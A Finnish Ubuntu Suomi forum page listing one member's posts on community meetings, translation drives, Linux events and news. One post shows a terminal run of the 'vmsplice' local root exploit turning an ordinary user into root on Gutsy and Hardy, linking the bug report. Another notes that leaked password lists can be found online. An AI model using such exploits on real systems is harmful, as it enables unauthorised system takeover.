Näytä kirjoitukset

Tässä osiossa voit tarkastella kaikkia tämän jäsenen viestejä. Huomaa, että näet viestit vain niiltä alueilta, joihin sinulla on pääsy.


Aiheet - Heikki Mäntysaari

Sivuja: [1] 2
1
Edellisessä yhteisön kokouksessa keskusteltiin uuden buntu Suomen yhteyshenkilön valinnasta.

Timo Jyrinki / Mirv on toiminut tehtävässä Ubuntu Suomen perustamisesta lähtien, ja on jo pitkään ilmoittanut halukkuutensa luopua tästä tehtävästä. Jussi Kekkonen / Tm_T ilmoittautui halukkaaksi tähän pestiin. Asiasta päättäminen jätettiin seuraavaan yhteisön kokoukseen, joka järjestetään sunnuntaina 3.10. Lisätietoja sivulla Yhteisön kokous.

Joitain yhteyshenkilön tehtäviä on kuvattu (alustavasti) wikisivulla Yhteyshenkilö. Tärkeintä on huomata, että kyseessä ei ole mikään johtohahmo, vaan tiettyjä käytännön asioita mm. Canonicalin suuntaan hoitava vastuuhenkilö.

Kaikki asiasta kiinnostuneet tervetuloa paikalle kokoukseen, joka järjestetään siis Freenode-verkossa IRC-kanavalla #ubuntu-fi-tiimit (kokouksen sivulla on ohjeet paikalle pääsemiseen).

---
Update/Timo: otsikko imperfektiin

2
Tempauksen tarkoituksena on suomentaa ainakin Gnome-työpöytäympäristön tärkeimpiä käännöstyötä vielä vaativia ohjelmia Ubuntu 10.10 -julkaisua ajatellen. Työn tulokset lähetään myös itse Gnome-projektille, jotta kaikki muutkin hyötyvät käännöksistä.

Kuka voi osallistua?

Kuka tahansa jolla suomen kieli ja käännöstyön perusteet ovat hallussa! Selaa läpi suomentajaryhmän kotisivun kohdat ”Kielitaito” sekä ”Viestintä ja yleistieto”. Jos et ole suomentajaryhmän jäsen, voit tehdä vain käännösehdotuksia, jotka jonkun toisen täytyy ottaa käyttöön. Jos innostut suomentamisesta, voit myös harkita Ubuntun suomentajaryhmään liittymistä.

Lisätietoja, ohjeita kääntämiseen ja käännettäviä tekstejä: http://wiki.ubuntu-fi.org/K%C3%A4%C3%A4nt%C3%A4minen/Tempaus_12.09.2010

3
Tämänpäiväisessä yhteisön kokouksessa mietittiin, mikä Assemblyjen Linux-ständin kanssa oli hyvää ja mitä pitää kehittää. Todettiin, että ständin ulkoasun ammattimaisuutta on syytä parantaa. Tämä tapahtuisi hankkimalla
  • Jonkinlainen vaakasuora Linux- tai Ubuntu Suomi -plakaati
  • Linux/Ubuntu Suomi -paitoja esittelyhenkilöstölle

Meillä on jo mm. banderolleja, mutta ständiltä ei nyt tule selkeästi ilmi, mistä on kyse. Samalla homma näyttää turhan amatöörimäiseltä. Tähän auttaisi paljon, jos banderollien lisäksi olisi joku vaakasuora Ubuntu Suomi- tai Linux-plakaati (varmaan kangasta?), jonka voisi ripustaa ständin yläpuolelle täi ständin pöytien eteen.

Lisäksi yhteinäinen vaatetus ständihenkilöstölle antaisi hyvän vaikutelman. Tällä hetkellä osalla on vanhoja Ubuntu Suomi t-paitoja, joillain jotain muita Linux-paitoja ja lopuilla ei mitään asiaan liittyvää. Esimerkiksi tällaiset kauluspaidat kaikille olisivat hyvät. Tosin ehkä ennemmin yleisemmin Linux kuin Ubuntu (Suomi)? Näissä on toki omat logistiset ongelmansa (säilytys, postitus, peseminen jne.) mutta sanoisin että olisi silti syytä hommata jotakin.

Tavaroiden tarve ei koske pelkästään Assemblyjen Linux-ständiä, vaan näille tavaroille voisi olla tarvetta muuallakin. Rahaahan meillä on käytössä vielä n. 1000€, kts. FLUG-palkintorahat.

Nyt kysymys kuuluukin, mitä hommataan ja mistä. Ja millaista? Plakaatia varten tarvitaan joku grafiikkaa taitava suunnittelemaan ulkoasua. Lisäksi ainakaan itselläni ei ole mitään hajua, mistä sellaista kannattaisi lähteä hommaamaan sopuhintaan.

4
Akademyn yhteydessä järjestettiin Suomalaisten vapaiden ohjelmien ympärillä toimivien yhteisöjen ja yhdistysten tapaaminen. Yksi tapaamisen anti oli ajatus ison mittakaavan mainoskampanjasta, jolla tehtäisiin tunnetuksi Linuxia ja vapaita ohjelmia.

COSS:in edustajat lupautuivat auttamaan rahoituksen hankkimisessa (esim. graafikon palkkaamiseen yms.), jos tekijät löytyvät yhteisöstä. Ubuntu Suomi on suurin suomalainen Linux-yhteisö, joten olisi tärkeää löytää täältä markkinointi-ihmisiä, jotka lähtisivät mukaan projektiin.

Kampanjan sisältöä ei vielä tarkemmin suunniteltu. Siinä haluttaisiin kuitenkin tuoda esille vapaiden ohjelmien ajatusta, eli että ihmiset vähintäänkin ajattelisivat, että ohjelmien/sisältöjen vapaus on hyvä asia. Lisäksi konkreettisina vaihtoehtoina käyttöjärjestelmistä mainostettaisiin esimerkiksi Ubuntua.

Itse olen enemmänkin kiinnostunut tekniikasta eikä markkinointi ole omaa alaani. Siksi toivonkin, että yhteisöstä löytyy ihmisiä, jotka ovat valmiita suunnittelemaan ja toteuttamaan kampanjaa. Nyt olisi ainutkertainen tilaisuus toteuttaa jotain suurempaa.

Jotain pitäisi olla valmiina 26.9., jolloin Tampereella järjestetään Finhack, jonka yhteydessä järjestetään seuraava Linux-yhteisöjen tapaaminen.

5
Eilisessä yhteisön kokouksessa keskusteltiin Ubuntu Suomen oman Avoimen viikon järjestämisestä kansainvälisen Ubuntu Open Weekin ja Ubuntu Developer Weekin jalanjäljissä.

Tähän liittyen kyselisinkin mielipiteitä siitä, olisiko tällaiselle tapahtumalle kiinnostusta. Tällöin järjestettäisiin esimerkiksi viikon aikana iltaisin 1-2h mittaisia esityksiä Ubuntu Suomen IRC-kanavalla, joissa käytäisiin läpi erilaisia aiheita esimerkiksi suomentamiseen, bugien korjaamiseen tai Ubuntu Suomen toimintaan liittyen. Jokaisen session vetäjä kertoo jostain aihealueesta ja mm. vastailee käyttäjien kysymyksiin.

Eli miltä tällainen Ubuntu Suomen oma suomenkielinen vastine kuulostaisi? Osallistuisitko ja haluaisitko jopa pitää jonkin esityksen? Millaisista aiheista toivottaisiin esityksiä?

Jotain esimerkkiaiheita, joita voitaisiin harkita jos kiinnostusta ja pitäjä löytyy:
  • Ubuntun suomentaminen
  • Virheraporttien tekeminen ja seuranta
  • Ohjelmien paketoiminen
  • Ubuntun julkaisutapahtuma
  • Ubuntun markkinointi Suomessa
  • Jne.

6
Nyt olisi tarjolla helppo tapa osallistua Ubuntun kehitykseen. Jauntyn kielipaketit ovat päivittymässä lähiaikoina mutta päivityspaketit eivät päädy ohjelmalähteisiin jos niitä ei ensin testata. Suomen kielipakettien testaamisvastuu on Ubuntun yhteisön suomalaisilla jäsenillä (eli siis meillä kaikilla).

Nyt toivoisin että muutamat käyttäjät asentaisivat esijulkaistuista päivityksistä (proposed) uudet kielipaketit ja raportoisivat, jos niistä aiheutuu ongelmia. Erityisesti Kubuntun käyttäjien kommentteja kaivataan.

Päivitysten asennus:
Ota käyttöön proposed-ohjelmalähde valitsemalla Järjestelmä->Ylläpito->Ohjelmalähteet. Valitse Päivitykset-välilehti ja rastita kohta Esijulkaistut päivitykset ja paina Sulje-painiketta. Asenna tämän jälkeen päivitykset, jolloin uudet kielipaketit (ja joitain muita esijulkaistuja päivityksiä) asentuu. Kirjaudu tämän jälkeen ulos jotta uudet käännökset otetaan käyttöön.

Testaile tämän jälkeen eri (main-ohjelmalähteen) ohjelmia. Ilmoita tähän ketjuun jos
  • A) Testasit ja ongelmia ei esiintynyt. Kerro tällöin käyttämäsi jakelu (Ubuntu/Kubuntu/Xubuntu).
  • B) Uudet kielipaketit aiheuttavat ongelmia. Jonkun ohjelman kohdalla käännöksiä katoaa, uusissa käännöksissä on vakavia virheitä tai joku ohjelma muuttuu kokonaan englanninkieliseksi. Kuvaile ongelma ja kerro käyttämäsi jakelu.
Asennettuasi uudet käännökset voit poistaa proposed-ohjelmalähteen käytöstä.

Lisätietoja testaamisesta löytyy osoitteesta https://wiki.ubuntu.com/Translations/LanguagePackUpdatesQA

7
Nyt kun Karmic alkaa olemaan jo innokkaimmilla testaajilla käytössä ja sen kääntäminenkin on mahdollista, on aika alkaa keräämään myös käännöksissä olevia virheitä.

Tässä vaiheessa EI ole vielä syytä ilmoittaa kääntämättömistä merkkijonoista. Suurin osa käännöksistä odottaa vielä päivittymistään esimerkiksi Gnomen suomennoksista, joten kääntämättömiä merkkijonoja on paljon. Sen sijaan tässä vaiheessa voi jo ilmoitella käännöksissä esiintyviä kirjoitus- ja asiavirheitä.

Virheistä voi ilmoitella tähän viestiketjuun tai etenkin laajempien ongelmien osalta voi käyttää myös Launchpadia, ohjeet löytyvät wikistä.

Jahka kehityssykli on pidemmällä ja kielipaketit suurin piirtein kunnossa voidaan alkaa metsästämään myös kääntämättömiä merkkijonoja.

Ps. Jos käännösryhmän jäsenyys kiinnostaa, lisätietoja löytyy täältä.

8
Ubuntun kehitysversio / Launchpad avautuu (lopultakin)
« : 15.01.09 - klo:07.28 »
Launchpadin vapauttamista on pitkään vaadittu eri tahoilta ja Ubuntua onkin (aiheesta) kritisoitu siitä, että sen kehityksen kannalta keskeinen komponentti ei ole vapaa. Mutta enää ei tarvitse tyytyä epämääräisiin lupauksiin Launchpadin koodin avaamisesta "joskus tulevaisuudessa" vaan nyt se on selvää: jokainen pääsee pystyttämään oman muokatun Launchpadinsa 20.7!

Lähde: https://dev.launchpad.net/Releases/2009Calendar Katso/kuuntele myös http://news.launchpad.net/podcast/launchpod-15-launchpads-going-open-source

9
Kirjoitin Ubuntun suomennoslistalle ehdotuksen uudeksi järjestelmäksi käännösvirheiden raportointia varten. Eli että suomennosvirheet (typot, virheelliset käännökset yms.) raportoitaisiin Launchpadiin language-pack-fi-paketin bugeiksi. Tällöin näiden korjaamisen (myös upstreamiin, esim. KDE:n/Gnomen käännöksiin) koordinointi olisi helpompaa, sillä nykyisin käännösvirheistä raportoidaan montaa eri kautta ja jotkut raportit hukkuvat viestien sekamelskaan.

Koko viesti täällä: https://lists.ubuntu.com/archives/ubuntu-l10n-fin/2008-November/000102.html

Koska listalla ei tullut paljoa vastauksia niin kysynpä myös täällä:

Jos olet kääntäjä: olisiko tämä mielestäsi järkevä tapa koordinoida virheiden korjaamista?
Jos et ole kääntäjä: ilmoittaisitko käännösvirheet Launchpadiin jos siihen olisi selkeät ohjeet?

10
FLUG jakaa muutaman vuoden tauon jälkeen Linux-tekijä-palkinnon. Palkinto jaetaan tänä vuonna 8.5. HP Linux Forum -tapahtuman yhteydessä. Palkinnon saajia voi ehdottaa 20.4. saakka osoitteessa http://www.flug.fi/linuxtekija/2008/

Olisiko Ubuntu Suomi vuoden Linux-tekijä?

11
FLUG järjestää lauantaina 22.3. klo. 18:00 ravintola Tillikassa (http://www.tillikka.fi) vapaamuotoisen käyttäjätapaamisen Tampereella. Tapahtuma on samalla myös Linux.fi-wikin ylläpitäjien ja käyttäjien tapaaminen.

Kaikki Linux.fistä (ja yleisemminkin Linuxista) kiinnostuneet ovat tervetulleita.

Ilmoitus: http://mail.fsfeurope.org/pipermail/fsfe-fi/2008-March/000011.html

12
Koodia: [Valitse]
$ gcc exploit.c -o exploit
 $ whoami
 heikki
 $ ./exploit
 -----------------------------------
  Linux vmsplice Local Root Exploit
  By qaaz
 -----------------------------------
 [+] mmap: 0x0 .. 0x1000
 [+] page: 0x0
 [+] page: 0x20
 [+] mmap: 0x4000 .. 0x5000
 [+] page: 0x4000
 [+] page: 0x4020
 [+] mmap: 0x1000 .. 0x2000
 [+] page: 0x1000
 [+] mmap: 0xb7d90000 .. 0xb7dc2000
 [+] root
 $ whoami
 root
Toimii ainakin Gutsyssä ja Hardyssä.

Korjausta ei vielä löydy, kannattaa seurata tätä: https://bugs.launchpad.net/ubuntu/+bug/190587

13
Ubuntu Suomi on kutsuttu näyttelleasettajaksi Avointen ohjelmien päivä 2008:aan. Tapahtuma järjestetään Turussa 8.3.2008.  Tapahtuman teemana on tänä vuonna vapaiden ohjelmien ammatillinen käyttö.

Löytyisikö lähtijöitä? Kutsussa pyydetään nimenomaan esittelemään Ubuntu Suomen toimintaa, ei niinkään itse Ubuntua.

Sähköpostilistalle tullut kutsu: https://lists.ubuntu.com/archives/ubuntu-fi/2007-December/000288.html
Avointen ohjelmien päivä: http://turuxi.org/AOP2008:Etusivu

Itse olisin alustavasti valmis osallistumaan, jos satun olemaan tuolloin lomilla intistä.

14
Monista palveluista (mm. Irc-Galleria, MuroBB, rakkausrunot.fi ja battle.fi) on kräkätty kymmenien tuhansien suomalaisten käyttäjätunnukset ja salasanat tai salasanojen hashit (MD5 tai SHA). Ylen uutinen aiheesta: http://www.yle.fi/uutiset/24h/id72257.html

Monet listalla olevista MD5- ja SHA-hasheista on myös onnistuttu murtamaan.

Jos käytät yllä mainittuja palveluita, vaihda salasanasi. Varsinaista listaa en tänne linkitä, mutta jos haluat tarkistaa löydytkö listalta, löydät sen varmasti.

Taas muistutus siitä, että salasanan täytyy olla riittävän monimutkainen, ja se pitää vaihtaa riittävän usein (tässä olisi kyllä minullakin parannettavaa...). Eikä sekään aina riitä.

15
Ubuntun kehitysversio / Ubuntu 8.04 Hardy Heron LTS
« : 29.08.07 - klo:14.33 »
Gutsy alkaa pikkuhiljaa lähestymään julkaisua, ja on aika kääntää katse seuraavaan Ubuntu 8.04:ään, kutsumanimeltään Hardy Heroniin. Hardy tulee olemaan toinen LTS (Long Term Support) -versio Ubuntusta, eli sitä tuetaan palvelimissa 5 vuotta ja työpöydällä 3.

Jäädäänpä seurailemaan, mitä kaikkea kivaa tuohon versioon olisi tulossa. Mitään suuria teknisiä uudistuksia ei tosin varmaan ennen LTS-versiota tehdä.

Introducing the Hardy Heron

16
Lainaus käyttäjältä: Myrtti ubuntu-markkinointi-listalla
FLUG Linux Demo Day Paasitornissa 29.9.

FLUG on jo aiemmin keväällä varannut perinteistä LDD-tapahtumaa varten
tilat Helsingissä sijaitsevasta Paasitornista. Asiaa hoitamaan
lupautuneet ihmiset ovat tehneet tiettyjä ns. ohareita, joten tapahtumaa
toteuttamaan kaivattaisiin kipeästi luotettavia ihmisiä.

En ole tarkalleen tietoinen kuinka suuret tilat tapahtumaa varten on
varattu ja mitä muuta sopimukseen on ajateltu kuuluvan, mutta vaikka
tapahtuma peruttaisiinkin, siitä tulisi silti kuluja. Jos löytäisimme
joukostamme (ja muittenkin avointen ohjelmistojen / jakeluversioitten
harrastajista) riittävästi tapahtumaan tekijöitä, ei tilaa tarvitsisi
perua.

Tällainen tapahtuma olisi kyseessä. Olisiko täällä kiinnostuneita osallistujia? Tarkoituksena olisi siis demota Linuxilla erilaisia asioita Compizista OpenOfficen kautta vaikka musiikkityöasemakäyttöön. Tapahtuma on käsittääkseni ollut aiempina vuosina melko suosittu, joten olisi ikävä jättää se kokonaan järjestämättä.

Kovin tarkkoja suunnitelmia tapahtumaa varten ei vielä ole. Tässä vaiheessa haetaan alustavasti vapaaehtoisia, jotka voisivat mm. tuoda esittelykoneita, pitää esityksiä yms. Jos kiinnostuneita löytyy, voidaan ryhtyä organisoimaan hommaa tosissaan ja hakemaan osallistujia myös OpenSUSE Suomelta ja mahdollisesti muiltakin yhteisöiltä.

Tapahtuman wikisivu: http://wiki.ubuntu-fi.org/Wiki/LinuxDemoDay_2007

17
Laitealue / Kannettava haussa
« : 31.05.07 - klo:11.40 »
Tässä olisi tarkoitus ostaa n. 800€-budjetilla kannettava. Pienellä tutkimisella löysin LinuxCompista tällaisen vaihtoehdon: Asus F3M (AMD Turion 64 1600MHz, 1024mt, 120gt, GeForce Go6100, 856€).

Mitä sanotte, onko hinta/laatusuhteeltaan hyvä vaihtoehto? Linux-tuki lienee ainakin kunnossa kun kerran LinuxComp myy. Osaako joku suositella parempia vaihtoehtoja? Vaatimuksena tietysti mahdollisimman hyvä yhteisymmärrys Linuxin ja koneen välillä (WLAN, lepotila jne).

18
Oppaiden kehittäminen / Deb-paketin tekeminen [Linux.fi]
« : 29.05.07 - klo:14.14 »
Olen kirjoitellut Linux.fihin suomenkielistä opasta deb-pakettien tekemiseen. Tällä hetkellä oppaan ohjeilla on mahdollista saada aikaan suhteellisen yksinkertaisia paketteja. Asiaa toki tarvittaisiin lisää, mutta wikin idean mukaisesti kaikki voivat muokata sitä. Myös kommentit kelpaavat.

http://linux.fi/index.php/Deb-paketin_tekeminen

19
Käännöstiimissä olisi tarkoitus kokeilla jonkinlaisena yhteistyökäännösprojektina kääntää Ubuntun ohjeiden uuden käyttäjän oppaasta "Jos olet käyttänyt Windowsia" -osio. Launchpadissa tämä osio löytyy täältä (vain kääntämättömät tekstijonot).

Tässä olisi samalla mahdollisuus uusille kääntäjille helppo lähteä hommaan mukaan (tai ainakin kokeilla, sopiiko homma itselle). Käännöstyötä varten tarvitset tunnuksen Launchpadiin, jonka jälkeen voit jättää ehdotuksia tekstijonojen käännöksiksi (linkit yllä). Ehdotukset näkyvät sitten muille, ja kääntäjästatuksen omaavat voivat tarkistaa ne ja klikata ne käyttöön. Kun olet lukenut suomentajaryhmän vaatimukset ja kokeillut vähän kääntämistä, voidaan sinulle antaa oikeudet suoraan muuttaa suomennoksia.

Nyt tehtävät käännökset valuvat myöhemmin Feistyyn päivitysten yhteydessä, ja niitä käytetään myös seuraavassa versiossa. Kääntämiseen riittää, kunhan ymmärtää englantia ja suomen kielioppi on suhteellisen hyvin hanskassa. Eli rohkeasti vaan mukaan, apua voi kysellä irkissä kanavalla #ubuntu-fi-tiimit (Freenode), käännösryhmän sähköpostilistalla osoitteessa ubuntu-l10n-fin@lists.ubuntu.com (liity) tai foorumilla. Tekemällä oppii ja nyt oppiminen on erityisen helppoa!

Katso myös:
Timon viesti aiheesta sähköpostilistalla (mm. ohjeita kääntämiseen)
Käännösohjeita
lokalisointi.org

20
Yleistä keskustelua / Avoin Java julkaistu
« : 09.05.07 - klo:10.51 »
Uutinen: http://sektori.com/uutiset/7689/sun  http://www.digitoday.fi/page.php?page_id=9&news_id=200711274&rss=6

Hieno homma, vaikkei aivan kaikkia osia pystytty julkaisemaankaan avoimena. Nyt on mielenkiintoista seurata, miten Java lähtee kehittymään vapaana ohjelmana. Ja peruskäyttäjän näkökulmasta tämä on myös hyvä uutinen, sillä GPL:n alainen Java voidaan asentaa vaikka oletuksena tulevaan Ubuntuun (olettaen että kaikki tarvittavat osat on nyt avattu, en tiedä tarkasti).

Vanha blogiartikkeli aiheesta: http://ubuntu-fi.org/blog/2006/gpl-java/

Sivuja: [1] 2